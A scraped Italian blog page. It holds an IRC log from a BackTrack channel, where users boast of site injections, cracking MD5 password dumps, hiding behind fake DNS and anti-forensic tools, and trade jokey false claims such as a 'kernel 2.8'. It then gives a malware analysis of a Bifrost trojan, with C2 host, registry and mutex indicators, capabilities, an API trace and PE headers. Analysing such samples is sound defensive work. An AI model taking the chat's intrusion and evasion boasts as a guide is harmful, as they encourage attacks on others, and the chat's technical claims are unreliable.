/>15:44 @keeley che versione del kernel hai compilato?=??<br />15:44 @keeley che a me piace sempre compilarmi il kernel da solo..<br />15:44 GOLDMAN kernel 2.6<br />15:44 @keeley si ma quale.. 2.6 è generico<br />15:44 crossbower hai provato il 2.8.1.2 sperimentale?<br />15:44 GOLDMAN no<br />15:44 crossbower ha un sacco di features in piu'<br />15:45 @keeley si ma solo uno serio lo può mettere..<br />15:45 @keeley non è facile da compilare..<br />15:45 GOLDMAN questo il kernel che usato 2.6.31.1<br />15:46 GOLDMAN usati bsd ???<br />15:46 crossbower come?<br />15:46 @keeley che OS hai???<br />15:47 watakushi wow ma èuna gara a chi ce l'ha più lungo? :)<br />15:48 GOLDMAN adesso uso windows xp pero uso vmware con freebsd 7 e backtrack 3 e il mio linux oujuba<br />15:48 crossbower oujuba?<br />15:48 @keeley windows xp.... xD<br />15:48 @keeley ma metti gentoo<br />15:49 ee crossbower [n=geek@host136-183-dynamic.12-79-r.retail.telecomitalia.it] has left #backtrack.it []<br />15:49 ee crossbower [n=geek@host136-183-dynamic.12-79-r.retail.telecomitalia.it] has joined #backtrack.it<br />15:49 ee mode/#backtrack.it [+v crossbower] by ChanServ<br />15:49 GOLDMAN e un linux arabo lo fatto io<br />15:50 @keeley che hai fatto???<br />15:50 @keeley narra...<br />15:50 Spagn qualcosa di migliore di dia?<br />15:50 aliceinwire il mio strap on è sicuramente più lungo del vostro vostro !<br />15:51 GOLDMAN ho fatto linux in arabo<br />15:51 +crossbower c'e' un sito?<br />15:51 @keeley hai caricato le lingue...<br />15:51 +crossbower si puo' scaricare?<br />15:51 Spagn un linux arabo?<br />15:51 Spagn 4tino<br />15:51 Spagn come se ci volesse tanto a caricare utf8 e supporto lingue<br />15:51 Spagn fortino da vvero<br />15:51 aliceinwire windows xp LOL<br />15:51 aliceinwire e vmware ahahahaha<br />15:52 GOLDMAN alice benvenuto in mio pc si vuoi<br />15:52 GOLDMAN ok<br />15:52 aliceinwire ha usato il apcchetto per fare le distro con poca fatica non mi ricordo il nome<br />15:52 GOLDMAN tutti porti aperti<br />15:52 aliceinwire GOLDMAN, che ?<br />15:53 Spagn mi serve visio<br />15:53 aliceinwire dici da questo ip GOLDMAN ? net-93-65-104-172.cust.dsl.vodafone.it<br />15:54 GOLDMAN si il mio<br />15:54 @keeley e che ci facciamo?<br />15:54 fiox lol<br />15:54 GOLDMAN provati a entrare<br />15:55 fiox è una sfida mi sa<br />15:55 fiox ghgh<br />15:55 aliceinwire come ti trovi a milano GOLDMAN ?<br />15:55 aliceinwire è una bella città ?<br />15:55 GOLDMAN sono da rovigo<br />15:55 GOLDMAN bella<br />5:55 aliceinwire be da quelle parti<br />15:55 aliceinwire non ho ancora l accesso ai satelliti militari sai com'è<br />15:56 aliceinwire mi limito a triangolazioni di traceroute<br />15:56 GOLDMAN i root server di vodafone<br />15:56 @keeley aliceinwire: hai visto quel inject sul sito del "monastero" ceh forte... gli si è defacciata tutta la pagina di accesso e da le password<br />15:56 aliceinwire ahahah<br />15:56 GOLDMAN hhhhhhhhhhhhhhhhhhhhhhhhhhh<br />15:56 GOLDMAN allora nessuno<br />15:56 aliceinwire vero ma con l exploit che ti ho dato ?<br />15:56 @brigante ragazzi, please<br />15:56 @keeley si<br />15:57 aliceinwire cavoli allora era davvero uno 0day<br />15:57 GOLDMAN volete che provo io<br />15:57 Spagn sisi fate i galli, non vedo l'ora che vi arrivino a casa :D<br />15:57 +crossbower allora ragazzi, é meglio che non parliamo di queste cose qui<br />15:57 +crossbower é roba top-secret<br />15:57 @keeley ciai ragione cross.. :D<br />15:57 +crossbower ultimamente anche windows7 é affetto<br />15:57 @keeley è un colabrodo..<br />15:57 aliceinwire ma in che algoritmo ti ha dato le pass ?<br />15:57 @keeley con quel exploit è una groviera<br />15:57 aliceinwire sono da decriptare ?<br />15:58 @keeley si in md5 a 516 bit<br />15:58 aliceinwire possiamo usare lo script per decifrare i md5 allora<br />15:58 aliceinwire quello li decifra in pochi secondi<br />15:58 @keeley embè D:<br />15:58 GOLDMAN hhhhhhhhhhhhhhhhhhhhhhh<br />15:58 Spagn qualcuno davvero bravo con DIA?<br />15:58 +crossbower e windows server 2008<br />15:59 aliceinwire pure con il mio centrino con 512 mb di ram ci ha messo 5 minuti a decifrarmeli tutti<br />16:00 aliceinwire e poi quell exploit è in python può essere eseguito anche da windows<br />16:00 Spagn anfami rispondete invece di trollare<br />16:00 +crossbower DIA non lo conosco, sorry<br />16:00 @keeley lascia stare DIA quello è un dos micidiale!<br />16:00 aliceinwire io torno a risettarmi i fake dns e i proxy altrimenti mi beccano<br />16:00 aliceinwire devo fare in fretta a dopo<br />16:01 Spagn babbe' ho capito, apetto visio e gioco con lui<br />16:01 Spagn dia lo sto gia' odiando<br />16:01 GOLDMAN alice si uss bsd cosi lavori tranq<br />16:02 aliceinwire ah cavoli<br />16:02 @keeley uss bsd e cosa è?<br />16:02 aliceinwire infatti<br />16:02 +crossbower GOLDMAN, conosci ethical hacker?<br />16:02 aliceinwire che la installo subito<br />16:03 GOLDMAN si cross ho un testato francesi<br />16:03 GOLDMAN keely bsd e un os<br />16:04 aliceinwire e perchè sono sicura con bsd ?<br />16:04 @keeley uss volevo sapere<br />16:04 @keeley perme stai più sicuro con il guanto :D<br />16:05 GOLDMAN nessuno ti beca e un sistima che in 10 anni ha solo un exolit<br />16:05 +crossbower openBSD<br />16:05 @keeley con bsd uno è nascosto e nessuno mi becca? sicuro?<br />16:06 GOLDMAN cross io uso freebsd 7<br />16:06 +crossbower ok<br />16:06 +crossbower ok<br />16:06 GOLDMAN quel sistima ha di tools che non puoi immaginarli<br />16:07 @keeley davvero.. tipo?<br />16:07 @keeley celo ha quello che ti fa la triangolazione con i satelliti?<br />16:07 ee R00T_ATI_Portati [n=ihteam@93-41-147-96.ip82.fastwebnet.it] has quit [Client Quit]<br />16:08 +crossbower senti, sai configurare il firewall di FreeBSD? Preferisci IPTables o PF?<br />16:10 GOLDMAN si cross so configurarlo e freferisco iptables<br />16:11 @keeley lo voglio anchio openbsd allora.. ma dimmi i tools più interessanti???<br />16:11 GOLDMAN keely lo sai che con bsd puoi cambiare il tuo mac adress ogni 10 second<br />16:11 @keeley ma no .. ma come fa???<br />16:12 GOLDMAN si configura prima anche cancella e log file di root quando entre e esci<br />16:13 @keeley con tools antiforensi?^<br />16:14 GOLDMAN si bello<br />16:14 @keeley tipo?<br />16:14 @keeley che comandi usi di solito??<br />16:14 GOLDMAN Artifact wiping<br />16:14 Spagn dio bono ancora a dar corda a uno che scrive cagate ogni 2x3 a caso?<br />16:15 @keeley Spagn: ma è uno serio dai :D<br />16:15 GOLDMAN spagn parli da mi ??<br />16:15 @keeley no no...<br />16:15 @keeley ha sbagliato chat.. nn ti preoccupare :D<br />16:16 ee Lynx51 [n=Ixion@unaffiliated/lynx51] has joined #backtrack.it<br />16:16 Lynx51 hola<br />16:16 +crossbower hola Lynx51<br />16:16 GOLDMAN ok<br />16:17 GOLDMAN cross usi free bsd ??<br />16:18 +crossbower si<br />16:18 +crossbower usavo il 7.2<br />16:18 GOLDMAN quale ???<br />16:18 +crossbower freebsd, e un po di openbsd (4.3)<br />16:19 GOLDMAN come li trovi ?<br />16:19 +crossbower buoni<br />16:19 +crossbower mi piace la passibilita' di usare la modalita' blackhole<br />16:19 +crossbower che linux non ha...<br />16:20 GOLDMAN e vero pero che dici proviamo a fare una modalita uguale in linux ??<br />16:20 @keeley guarda che con il kernel 2.8 c'è la modalità blackhand!!!! che è simile ma è più avanzata<br />16:21 GOLDMAN davvero questo no lo sapevo<br />16:21 +crossbower GOLDMAN, non so, é un lavoro molto lungo<br />16:22 GOLDMAN lo so<br />16:38 GOLDMAN ragazzi devo andare via adesso stato un piacere a parlare con vuoi ciao<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1563747793106208271?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-67044705576886035652009-10-02T06:42:00.000-07:002009-10-02T08:31:50.842-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsYPOrB9txI/AAAAAAAAAQc/Ovm-2RyQgzM/s1600-h/server.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 153px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsYPOrB9txI/AAAAAAAAAQc/Ovm-2RyQgzM/s200/server.png" alt="" id="BLOGGER_PHOTO_ID_5388010748938925842" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br />Questo trojan è stato creato con Bifrost famoso tool per gestire il trojan bifrost<br />facendo una panoramica su questo server:<br />Nome del file: photo15_jpg.exe #cerca di confondersi come file jpg infatti ha anche l icona di una jpg<br />si installa nella directory di sistema<br />{AEDFB120-4369-AEF1-980E-CD34535DC196}<br />Mutex name:<br />pikachu<br />Registry key:<br />system123<br />process name:<br />msnmsgr.exe.<br />rootkit hide process<br /><br />dns: vnc-k3v.no-ip.org / 83.192.102.236 port: 8978 <br /><br />IP address : 83.192.102.236 <br />IP country code: FR<br />IP address country: ip address flag France<br />IP address state: Nord-Pas-de-Calais<br />IP address city: Crochte<br />IP address latitude: 50.9333<br />IP address longitude: 2.3833<br />ISP of this IP : France Telecom<br />Organization: France Telecom<br />Host of this IP: [?]: ALille-252-1-14-236.w83-192.abo.wanadoo.fr [Whois] [Trace]<br />Local time in France: 2009-10-02 16:14<br /><br />Host of the IP: vnc-k3v.no-ip.org<br />Host IP: 69.65.19.125<br />IP country code: US<br /><br />The server builder component has the following capabilities:<br /><br /> * Create the server component<br /> * Change the server component's port number and/or IP address<br /> * Change the server component's executable name<br /> * Change the name of the Windows registry startup entry<br /> * Include rootkit to hide server process<br /> * Include extensions to add features (adds 22,759 bytes to server)<br /> * Use persistence (makes the server harder to remove from the infected system)<br /><br />The client component has the following capabilities:<br /><br /> * Process Manager (Browse or kill running processes)<br /> * File manager (Browse, upload, download, or delete files)<br /> * Window Manager (Browse, close, maximize/minimize, or rename windows)<br /> * Get system information<br /> * Extract passwords from machine<br /> * Keystroke logging<br /> * Screen capture<br /> * Webcam capture<br /> * Desktop logoff, reboot or shutdown<br /> * Registry editor<br /> * Remote shell<br /><br /><br /><br />Reports:<br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Code:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />0009:Starting process L"Z:\\tmp\\vir\\1c23ff4a4784fa6ad8fbbe75078d68af\\malware.exe" (entryproc=0x403780)<br />0009:Call KERNEL32.GetModuleHandleA(00000000) ret=00401b99<br />0009:Call KERNEL32.GetCurrentThreadId() ret=00401adb<br />0009:Call KERNEL32.GetModuleHandleA(00000000) ret=004032d0<br />0009:Call KERNEL32.GetModuleFileNameA(00400000,0032fdc6,00000104) ret=004032d6<br />0009:Call ntdll.LdrLockLoaderLock(00000000,00000000,0032fcb8) ret=7b864d2a<br />0009:Call ntdll.LdrFindEntryForAddress(00400000,0032fcb4) ret=7b864d44<br />0009:Call ntdll.LdrUnlockLoaderLock(00000000,00000009) ret=7b864d9c<br />0009:Call KERNEL32.GetModuleFileNameA(00000000,0032fc8c,00000105) ret=00401389<br />0009:Call ntdll.LdrLockLoaderLock(00000000,00000000,0032fb98) ret=7b864d2a<br />0009:Call ntdll.LdrFindEntryForAddress(00400000,0032fb94) ret=7b864d44<br />0009:Call ntdll.LdrUnlockLoaderLock(00000000,00000009) ret=7b864d9c<br />0009:Call KERNEL32.LoadLibraryA(0011de28 "kernel32.dll") ret=0040314e<br />0009:Call ntdll.LdrLoadDll(00121870 L"Z:\\tmp\\vir\\1c23ff4a4784fa6ad8fbbe75078d68af;.;C:\\windows\\system32;C:\\windows\\system;C:\\windows;",00000000,0032fda8,0032fb68) ret=7b8655a7<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdd8,00000000,0032fdd4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdd8,00000000,0032fdd4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdd8,00000000,0032fdd4) ret=7b865abb<br />0009:Call ntdll.NtQuerySystemTime(0032fde0) ret=7b8531cd<br />0009:Call KERNEL32.Sleep(00000096) ret=004031d5<br />0009:Call ntdll.NtDelayExecution(00000000,0032fdc8) ret=7b889913<br />0009:Call ntdll.NtQuerySystemTime(0032fde0) ret=7b8531cd<br />0009:Call KERNEL32.Sleep(00000096) ret=004031e3<br />0009:Call ntdll.NtDelayExecution(00000000,0032fdc8) ret=7b889913<br />0009:Call ntdll.NtQuerySystemTime(0032fde0) ret=7b8531cd<br />0009:Call KERNEL32.LoadLibraryA(0011de28 "kernel32.dll") ret=004033e3<br />0009:Call ntdll.LdrLoadDll(00121870 L"Z:\\tmp\\vir\\1c23ff4a4784fa6ad8fbbe75078d68af;.;C:\\windows\\system32;C:\\windows\\system;C:\\windows;",00000000,0032fdb8,0032fb78) ret=7b8655a7<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fde8,00000000,0032fde4) ret=7b865abb<br />0009:Call KERNEL32.LoadLibraryA(0011de78 "kernel32.dll") ret=0040342d<br />0009:Call ntdll.LdrLoadDll(00121870 L"Z:\\tmp\\vir\\1c23ff4a4784fa6ad8fbbe75078d68af;.;C:\\windows\\system32;C:\\windows\\system;C:\\windows;",00000000,0032fdb8,0032fb78) ret=7b8655a7<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fde8,00000000,0032fde4) ret=7b865abb<br />0009:Call KERNEL32.IsDebuggerPresent() ret=00403451<br />0009:Call KERNEL32.GetCommandLineA() ret=0040131c<br />0009:Call KERNEL32.LoadLibraryA(0011de40 "kernel32.dll") ret=00403515<br />0009:Call ntdll.LdrLoadDll(00121870 L"Z:\\tmp\\vir\\1c23ff4a4784fa6ad8fbbe75078d68af;.;C:\\windows\\system32;C:\\windows\\system;C:\\windows;",00000000,0032fd88,0032fb48) ret=7b8655a7<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call ntdll.LdrGetProcedureAddress(7b820000,0032fdb8,00000000,0032fdb4) ret=7b865abb<br />0009:Call KERNEL32.FindResourceA(00400000,0011ddf8 "KYNC",0000000a) ret=00403608<br />0009:Call ntdll.LdrFindResource_U(00400000,0032fd50,00000003,0032fc8c) ret=7b88041b<br />0009:Call KERNEL32.SizeofResource(00400000,00409140) ret=00403618<br />0009:Call KERNEL32.LoadResource(00400000,00409140) ret=0040362a<br />0009:Call ntdll.LdrAccessResource(00400000,00409140,0032fdb8,00000000) ret=7b8819a9<br />0009:Call KERNEL32.LockResource(00409e54) ret=00403634<br />0009:Call KERNEL32.FreeResource(00409e54) ret=00403644<br /></pre><br /></div><br /><br />Memory dump:<br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Code:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />%|`@<br />%x`@<br />%t`@<br />%p`@<br />%l`@<br />%h`@<br />%d`@<br />tSVW<br />t:VW<br />SVWU<br />C<"u1S Q<"u8S 7CF; 7CF; ]_^[ ZYYd ^[Y] YYZX SVWU ]_^[ SVWU ]_^[ SVWU -8P@ ]_^[ SVWU ]_^[ ;_^[ SVWRP Z_^[X uXJt uAJt u:Jt It1S t&amp;J| ;_^[ =XP@ ZYYd -$P@ ZYYd ZYYd - Q@ ZYYd -$Q@ ZYYd _^[YY] SVW3 ZYYd ZYYd -(Q@ ZYYd ZYYd ZYYd UO\XOV X^NVV 1O^:\YM+NN\O]] -\OK^O:\YMO]]+ 1O^>R\OKN-YX^Ob^<br /><okn:\ymo]]7owy\c c="O^">R\OKN-YX^Ob^<br /><o]_wo>R\OKN<br />@S\^_KV+VVYM/b<br />@S\^_KV:\Y^OM^/b<br />Da?XWKZ@SOa9P=OM^SYX<br />>O\WSXK^O:\YMO]]<br />ZYYd<br />-,Q@<br />registered<br />Xj[X<br />registered<br />registered<br />registered<br />registered<br />wrong serial<br />wrong serial<br />registered<br />registered<br />Xj[X<br />registered<br />registered<br />registered<br />registered<br />wrong serial<br />wrong serial<br />registered<br />registered<br />Xj[X<br />registered<br />registered<br />registered<br />registered<br />wrong serial<br />wrong serial<br />registered<br />registered<br />Xj[X<br />istered<br />registered<br />registered<br />registered<br />wrong serial<br />wrong serial<br />registered<br />ZYYd<br />Uh 2@<br />ZYYd<br />h'2@<br />UO\XOV<br />1O^:\YM+NN\O]]<br />1O^>SMU-Y_X^<br />=VOOZ<br />Uh{3@<br />ZYYd<br />C:\InsideTm\<br />Uho4@<br />ZYYd<br />hv4@<br />UO\XOV<br />1O^:\YM+NN\O]]<br />IsDebuggerPresent<br />Uh_6@<br /></o]_wo></okn:\ymo]]7owy\c></pre><br /></div><br /><br /><br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Code:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />----------DOS_HEADER----------<br /><br />[IMAGE_DOS_HEADER]<br />e_magic: 0x5A4D <br />e_cblp: 0x50 <br />e_cp: 0x2 <br />e_crlc: 0x0 <br />e_cparhdr: 0x4 <br />e_minalloc: 0xF <br />e_maxalloc: 0xFFFF <br />e_ss: 0x0 <br />e_sp: 0xB8 <br />e_csum: 0x0 <br />e_ip: 0x0 <br />e_cs: 0x0 <br />e_lfarlc: 0x40 <br />e_ovno: 0x1A <br />e_res: <br />e_oemid: 0x0 <br />e_oeminfo: 0x0 <br />e_res2: <br />e_lfanew: 0x100 <br /><br />----------NT_HEADERS----------<br /><br />[IMAGE_NT_HEADERS]<br />Signature: 0x4550 <br /><br />----------FILE_HEADER----------<br /><br />[IMAGE_FILE_HEADER]<br />Machine: 0x14C <br />NumberOfSections: 0x7 <br />TimeDateStamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]<br />PointerToSymbolTable: 0x0 <br />NumberOfSymbols: 0x0 <br />SizeOfOptionalHeader: 0xE0 <br />Characteristics: 0x818F <br />Flags: IMAGE_FILE_LOCAL_SYMS_STRIPPED, IMAGE_FILE_32BIT_MACHINE, IMAGE_FILE_BYTES_REVERSED_LO, IMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_LINE_NUMS_STRIPPED, IMAGE_FILE_BYTES_REVERSED_HI, IMAGE_FILE_RELOCS_STRIPPED<br /><br />----------OPTIONAL_HEADER----------<br /><br />[IMAGE_OPTIONAL_HEADER]<br />Magic: 0x10B <br />MajorLinkerVersion: 0x2 <br />MinorLinkerVersion: 0x19 <br />SizeOfCode: 0x2A00 <br />SizeOfInitializedData: 0x7E00 <br />SizeOfUninitializedData: 0x0 <br />AddressOfEntryPoint: 0x3780 <br />BaseOfCode: 0x1000 <br />BaseOfData: 0x4000 <br />ImageBase: 0x400000 <br />SectionAlignment: 0x1000 <br />FileAlignment: 0x200 <br />MajorOperatingSystemVersion: 0x4 <br />MinorOperatingSystemVersion: 0x0 <br />MajorImageVersion: 0x0 <br />MinorImageVersion: 0x0 <br />MajorSubsystemVersion: 0x4 <br />MinorSubsystemVersion: 0x0 <br />Reserved1: 0x0 <br />SizeOfImage: 0x11000 <br />SizeOfHeaders: 0x400 <br />CheckSum: 0x0 <br />Subsystem: 0x2 <br />DllCharacteristics: 0x0 <br />SizeOfStackReserve: 0x100000 <br />SizeOfStackCommit: 0x4000 <br />SizeOfHeapReserve: 0x100000 <br />SizeOfHeapCommit: 0x1000 <br />LoaderFlags: 0x0 <br />NumberOfRvaAndSizes: 0x10 <br />DllCharacteristics:<br /><br />----------PE Sections----------<br /><br />[IMAGE_SECTION_HEADER]<br />Name: CODE<br />Misc: 0x3000 <br />Misc_PhysicalAddress: 0x3000 <br />Misc_VirtualSize: 0x3000 <br />VirtualAddress: 0x1000 <br />SizeOfRawData: 0x2A00 <br />PointerToRawData: 0x400 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0x60000020<br />Flags: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ<br />Entropy: 6.392527 (Min=0.0, Max=8.0)<br />MD5 hash: 335fd2b34ad6a69fc874f6f4044e5f3d<br />SHA-1 hash: 7f3ba1591430d7b438def8ecffb1f3e081f90066<br />SHA-256 hash: bbc98f05f483cfbe8403396e4806aacf40866f578f5ee4beec52dc1b51f64ead<br />SHA-512 hash: 173ae22005f2ace488ac3ef57f2dd8100ed0fce562c11411699ded5492c81ec124256cd644b278a7162d28b5c759dbca90b1893ecf7a3952915cb83dc1e9360b<br /><br />[IMAGE_SECTION_HEADER]<br />Name: DATA<br />Misc: 0x1000 <br />Misc_PhysicalAddress: 0x1000 <br />Misc_VirtualSize: 0x1000 <br />VirtualAddress: 0x4000 <br />SizeOfRawData: 0x200 <br />PointerToRawData: 0x2E00 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0xC0000040<br />Flags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ<br />Entropy: 1.105826 (Min=0.0, Max=8.0)<br />MD5 hash: b6e17bf8fb5029cb6b5cf0e61876c459<br />SHA-1 hash: c1fe552007fbfeab9a047524be94d0cff6abd52d<br />SHA-256 hash: 7900f543fa6b30155fbe4fd609577bcc21fd0025270595eae56e971e8444989a<br />SHA-512 hash: ccf534bdf419e4438d7c73d58fb8983c772305e06f50a17309f3cea8cefeb2e91c5dc23313f58bf00ef7d54cda5a218ce0f4652f8ad4e1fc9b017642cc38937c<br /><br />[IMAGE_SECTION_HEADER]<br />Name: BSS<br />Misc: 0x1000 <br />Misc_PhysicalAddress: 0x1000 <br />Misc_VirtualSize: 0x1000 <br />VirtualAddress: 0x5000 <br />SizeOfRawData: 0x0 <br />PointerToRawData: 0x3000 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0xC0000000<br />Flags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ<br />Entropy: 0.000000 (Min=0.0, Max=8.0)<br />MD5 hash: d41d8cd98f00b204e9800998ecf8427e<br />SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709<br />SHA-256 hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<br />SHA-512 hash: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .idata<br />Misc: 0x1000 <br />Misc_PhysicalAddress: 0x1000 <br />Misc_VirtualSize: 0x1000 <br />VirtualAddress: 0x6000 <br />SizeOfRawData: 0x400 <br />PointerToRawData: 0x3000 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0xC0000040<br />Flags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ<br />Entropy: 2.863761 (Min=0.0, Max=8.0)<br />MD5 hash: dd0227fe333799f12db8c40912ac87f3<br />SHA-1 hash: 9e6eef93041d9925e98569f8afb86d26e90d6b2d<br />SHA-256 hash: 09fc6a80318564820d39861f6c35acab2166178e03a68635e831878bd6fb3185<br />SHA-512 hash: d7ea609ab04d415b76eefd76494ed6f010e9acbaa104a0ae56af90bab7c0c8ad5cf3a102908c6be92dd1ad5aa0ca8cee8fc1b4232add7df3dd77f6e5a8ec4cdb<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .tls<br />Misc: 0x1000 <br />Misc_PhysicalAddress: 0x1000 <br />Misc_VirtualSize: 0x1000 <br />VirtualAddress: 0x7000 <br />SizeOfRawData: 0x0 <br />PointerToRawData: 0x3400 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0xC0000000<br />Flags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ<br />Entropy: 0.000000 (Min=0.0, Max=8.0)<br />MD5 hash: d41d8cd98f00b204e9800998ecf8427e<br />SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709<br />SHA-256 hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<br />SHA-512 hash: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .rdata<br />Misc: 0x1000 <br />Misc_PhysicalAddress: 0x1000 <br />Misc_VirtualSize: 0x1000 <br />VirtualAddress: 0x8000 <br />SizeOfRawData: 0x200 <br />PointerToRawData: 0x3400 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0x50000040<br />Flags: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ<br />Entropy: 0.204488 (Min=0.0, Max=8.0)<br />MD5 hash: 3308d673b7c6e0dbe0de45bd95389f5e<br />SHA-1 hash: 3891e6d98accb8f59f37e1202871e632285bd61d<br />SHA-256 hash: d06ad14726818dcd3887a2c517b0c80416004e36b494dc5e8ff7aae2dad5b2d7<br />SHA-512 hash: 236bfd204d22319728ee2963ccb9dab32eeaa40c1dc262a3994065c4d656008381ee6b41931b6e3d5cf62f7e72283234befb8296281392b62cb6e950fde78ab3<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .rsrc<br />Misc: 0x75F8 <br />Misc_PhysicalAddress: 0x75F8 <br />Misc_VirtualSize: 0x75F8 <br />VirtualAddress: 0x9000 <br />SizeOfRawData: 0x7600 <br />PointerToRawData: 0x3600 <br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0x50000040<br />Flags: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ<br />Entropy: 7.763448 (Min=0.0, Max=8.0)<br />MD5 hash: a27dd9e454ed3679608c7b136d63b8b8<br />SHA-1 hash: c75a8c41eaba5a9fbba2a998492868a1e30f3935<br />SHA-256 hash: d9762d6e2714325a4044a36618d5a9faec092aa67d64a72ce32fbef603e19fde<br />SHA-512 hash: e771b19b7f67af1a9475d63e905da31796c14015ac304a5a3904677ddcb2abc8e16a1c70fa0cd00ef4a38103d03accc72eae91575e663faaae7407d7a64fcce3<br /><br />----------Directories----------<br /><br />[IMAGE_DIRECTORY_ENTRY_EXPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_IMPORT]<br />VirtualAddress: 0x6000 <br />Size: 0x268 <br />[IMAGE_DIRECTORY_ENTRY_RESOURCE]<br />VirtualAddress: 0x9000 <br />Size: 0x75F8 <br />[IMAGE_DIRECTORY_ENTRY_EXCEPTION]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_SECURITY]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_BASERELOC]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_DEBUG]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_COPYRIGHT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_GLOBALPTR]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_TLS]<br />VirtualAddress: 0x8000 <br />Size: 0x18 <br />[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_IAT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br 